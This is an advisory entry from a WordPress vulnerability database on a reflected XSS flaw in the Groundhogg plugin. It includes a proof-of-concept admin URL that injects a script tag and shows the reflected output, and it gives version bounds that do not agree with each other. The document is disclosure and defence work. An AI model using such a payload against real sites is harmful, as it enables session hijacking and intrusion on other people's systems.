WordPress Plugin Vulnerabilities
Groundhogg < 2.0.9.11 - Authenticated Reflected XSS
Description
Wordpress Groundhogg plugin with a version lower than 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability.
Proof of Concept
# Exploit Title: Wordpress Groundhogg <= 2.0.8.1 Authenticated Reflected XSS Vulnerability # Date: 22-10-2019 # Exploit Author: Lucian Ioan Nitescu # Contact: https://twitter.com/LucianNitescu # Webiste: https://nitesculucian.github.io # Vendor Homepage: https://www.groundhogg.io/ # Software Link: https://wordpress.org/plugins/groundhogg/ # Version: 2.0.8.1 # Tested on: Ubuntu 18.04 / Wordpress 5.3 1. Description: Wordpress Groundhogg plugin with a version lower then 2.0.8.1 is affected by an authenticated Reflected Cross-site scripting (XSS) vulnerability. 2. Proof of Concept: Reflected Cross-site scripting (XSS) - Using an Wordpress user, access < your_target > /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts<%2Fscript><script>alert(1)<%2Fscript> - The response will contain: bulk_action: 'groundhogg/bulk_job/gh_export_contacts</script><script>alert(1)</script>/ajax', items: bp.getItems(), the_end: bp.isLastOfThem() },
Affects Plugins
Fixed in 2.0.9.11 References
Classification
Type
XSS
OWASP top 10
CWE
Miscellaneous
Original Researcher
Lucian Ioan Nitescu
Submitter
Lucian Ioan Nitescu
Submitter website
Submitter twitter
Verified
No
WPVDB ID
Timeline
Publicly Published
2019-10-23 (about 4 years ago)
Added
2019-10-24 (about 4 years ago)
Last Updated
2019-11-28 (about 4 years ago)
WPScan 